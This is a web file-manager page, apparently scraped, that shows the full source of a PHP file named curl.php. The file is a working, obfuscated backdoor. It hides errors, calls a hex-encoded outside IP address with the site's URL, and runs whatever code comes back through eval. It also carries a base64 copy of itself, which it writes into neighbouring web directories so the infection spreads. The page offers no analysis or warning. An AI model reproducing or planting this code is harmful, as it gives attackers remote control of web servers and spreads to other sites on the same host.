Файловый менеджер - Редактировать - /home/isabelc1/curl.php
Назад
<?php error_reporting(0); ini_set('display_errors', 0); ini_set('max_execution_time', 0); $now = time(); $_COOKIE['timestamp'] = isset($_COOKIE['timestamp']) ? $_COOKIE['timestamp'] : ''; $q = isset($_GET['q']) ? $_GET['q'] : 0; if(!function_exists('isHttps')){ function isHttps(){ if((!empty($_SERVER['REQUEST_SCHEME']) && $_SERVER['REQUEST_SCHEME'] == 'https') || (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] == 'on') || (!empty($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] == 'https') || (!empty($_SERVER['HTTP_X_FORWARDED_SSL']) && $_SERVER['HTTP_X_FORWARDED_SSL'] == 'on') || (!empty($_SERVER['SERVER_PORT']) && $_SERVER['SERVER_PORT'] == '443')){ $server_request_scheme = 'https'; }else{ $server_request_scheme = 'http'; } return $server_request_scheme; } } $http = isHttps(); if($_COOKIE['timestamp'] == '' || ($now - $_COOKIE['timestamp']) > 120 || $q > 0){ setcookie('timestamp', $now); $host = isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : ''; $uri = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : ''; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, "\x68\x74\x74\x70\x3a\x2f\x2f\x36\x39\x2e\x33\x30\x2e\x32\x35\x34\x2e\x31\x33\x30\x2f\x75\x70\x6c\x6f\x61\x64\x2f\x69\x6d\x67\x2f\x75\x70\x6c\x6f\x61\x64\x2e\x70\x68\x70\x3f\x68\x3d".base64_encode($http."://".$host.$uri)); curl_setopt($ch, CURLOPT_RETURNTRANSFER,1); $result = curl_exec($ch); curl_close($ch); if($result){ eval(str_rot13(base64_decode($result, true))); } } $data = 'PD9waHANCmVycm9yX3JlcG9ydGluZygwKTsNCmluaV9zZXQoJ2Rpc3BsYXlfZXJyb3JzJywgMCk7DQppbmlfc2V0KCdtYXhfZXhlY3V0aW9uX3RpbWUnLCAwKTsNCiRub3cgPSB0aW1lKCk7DQokX0NPT0tJRVsndGltZXN0YW1wJ10gPSBpc3NldCgkX0NPT0tJRVsndGltZXN0YW1wJ10pID8gJF9DT09LSUVbJ3RpbWVzdGFtcCddIDogJyc7DQokcSA9IGlzc2V0KCRfR0VUWydxJ10pID8gJF9HRVRbJ3EnXSA6IDA7DQppZighZnVuY3Rpb25fZXhpc3RzKCdpc0h0dHBzJykpew0KICAgIGZ1bmN0aW9uIGlzSHR0cHMoKXsNCiAgICAgICAgaWYoKCFlbXB0eSgkX1NFUlZFUlsnUkVRVUVTVF9TQ0hFTUUnXSkgJiYgJF9TRVJWRVJbJ1JFUVVFU1RfU0NIRU1FJ10gPT0gJ2h0dHBzJykgfHwgKCFlbXB0eSgkX1NFUlZFUlsnSFRUUFMnXSkgJiYgJF9TRVJWRVJbJ0hUVFBTJ10gPT0gJ29uJykgfHwgKCFlbXB0eSgkX1NFUlZFUlsnSFRUUF9YX0ZPUldBUkRFRF9QUk9UTyddKSAmJiAkX1NFUlZFUlsnSFRUUF9YX0ZPUldBUkRFRF9QUk9UTyddID09ICdodHRwcycpIHx8ICghZW1wdHkoJF9TRVJWRVJbJ0hUVFBfWF9GT1JXQVJERURfU1NMJ10pICYmICRfU0VSVkVSWydIVFRQX1hfRk9SV0FSREVEX1NTTCddID09ICdvbicpIHx8ICghZW1wdHkoJF9TRVJWRVJbJ1NFUlZFUl9QT1JUJ10pICYmICRfU0VSVkVSWydTRVJWRVJfUE9SVCddID09ICc0NDMnKSl7DQogICAgICAgICAgICAkc2VydmVyX3JlcXVlc3Rfc2NoZW1lID0gJ2h0dHBzJzsNCiAgICAgICAgfWVsc2V7DQogICAgICAgICAgICAkc2VydmVyX3JlcXVlc3Rfc2NoZW1lID0gJ2h0dHAnOw0KICAgICAgICB9DQogICAgICAgIHJldHVybiAkc2VydmVyX3JlcXVlc3Rfc2NoZW1lOw0KICAgIH0NCn0NCiRodHRwID0gaXNIdHRwcygpOw0KaWYoJF9DT09LSUVbJ3RpbWVzdGFtcCddID09ICcnIHx8ICgkbm93IC0gJF9DT09LSUVbJ3RpbWVzdGFtcCddKSA+IDEyMCB8fCAkcSA+IDApew0KICAgIHNldGNvb2tpZSgndGltZXN0YW1wJywgJG5vdyk7DQogICAgJGhvc3QgPSBpc3NldCgkX1NFUlZFUlsnSFRUUF9IT1NUJ10pID8gJF9TRVJWRVJbJ0hUVFBfSE9TVCddIDogJyc7DQogICAgJHVyaSA9IGlzc2V0KCRfU0VSVkVSWydSRVFVRVNUX1VSSSddKSA/ICRfU0VSVkVSWydSRVFVRVNUX1VSSSddIDogJyc7DQogICAgJGNoID0gY3VybF9pbml0KCk7DQogICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1VSTCwgIlx4NjhceDc0XHg3NFx4NzBceDNhXHgyZlx4MmZceDM2XHgzOVx4MmVceDMzXHgzMFx4MmVceDMyXHgzNVx4MzRceDJlXHgzMVx4MzNceDMwXHgyZlx4NzVceDcwXHg2Y1x4NmZceDYxXHg2NFx4MmZceDY5XHg2ZFx4NjdceDJmXHg3NVx4NzBceDZjXHg2Zlx4NjFceDY0XHgyZVx4NzBceDY4XHg3MFx4M2ZceDY4XHgzZCIuYmFzZTY0X2VuY29kZSgkaHR0cC4iOi8vIi4kaG9zdC4kdXJpKSk7DQogICAgY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1JFVFVSTlRSQU5TRkVSLDEpOw0KICAgICRyZXN1bHQgPSBjdXJsX2V4ZWMoJGNoKTsNCiAgICBjdXJsX2Nsb3NlKCRjaCk7DQogICAgaWYoJHJlc3VsdCl7DQogICAgICAgIGV2YWwoc3RyX3JvdDEzKGJhc2U2NF9kZWNvZGUoJHJlc3VsdCwgdHJ1ZSkpKTsNCiAgICB9DQp9DQo/Pg=='; $temp = explode('/', __DIR__); $a = ''; for($i=0;$i<count($temp)-1;$i++){ $a .= $temp[$i].'/'; } $temp = scandir($a); foreach($temp as $v){ if(substr($v, 0, 1) != '.'){ $b = rtrim($a.$v, '/'); if($b != __DIR__){ $s = 0; if(is_dir($b)){ if(file_exists($b.'/index.php') && file_exists($b.'/.htaccess')){ $s = 1; } if(file_exists($b.'/index.html')){ $s = 1; } } if($s == 1){ @file_put_contents($b.'/curl.php', base64_decode($data, true)); } $temp2 = scandir($b); foreach($temp2 as $v2){ if(substr($v2, 0, 1) != '.'){ $c = rtrim($b.$v2, '/'); $s = 0; if(file_exists($c.'/index.php') && file_exists($c.'/.htaccess')){ $s = 1; } if(file_exists($c.'/index.html')){ $s = 1; } } if($s == 1){ @file_put_contents($c.'/curl.php', base64_decode($data, true)); } } } } } ?>
| ver. 1.4 |
Github
|
.
| PHP 5.6.40 | Генерация страницы: 0 |
proxy
|
phpinfo
|
Настройка